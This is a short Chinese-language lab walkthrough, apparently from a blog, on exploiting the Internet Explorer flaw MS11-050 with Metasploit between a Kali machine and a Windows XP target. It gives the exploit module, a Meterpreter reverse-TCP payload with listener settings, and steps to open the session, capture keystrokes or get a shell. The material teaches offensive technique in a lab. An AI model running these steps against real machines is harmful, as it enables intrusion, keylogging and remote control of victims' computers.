MS11-050安全漏洞

IE浏览器渗透攻击——MS11050安全漏洞

实验前准备

1、两台虚拟机，其中一台为kali，一台为windows xp sp3（包含IE7）。

2、设置虚拟机网络为NAT模式，保证两台虚拟机可以相互间ping通（关闭靶机防火墙）。

实验步骤：

1、在kali终端中开启msfconsole。

2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement，进入该漏洞模块。

3、输入info查看信息：

对应的targets：

4、设置对应的载荷set payload windows/meterpreter/reverse_tcp；

5、show options查看需要设置的相关信息：

6、设置相关信息

set LHOST ‘kali Ip’

set LPORT  XXXX
 
set URIPATH XXX

7、exploit,如下图所示，有靶机需要访问的ip地址：

8、在靶机IE上输入网址，并在靶机上查看信息。

• 靶机端IE：

• kali中显示一个session 1已经创建：

9、输入命令sessions -i 1,开始连接

9、已经攻击成功了，开始按键抓取

• 或者获取shell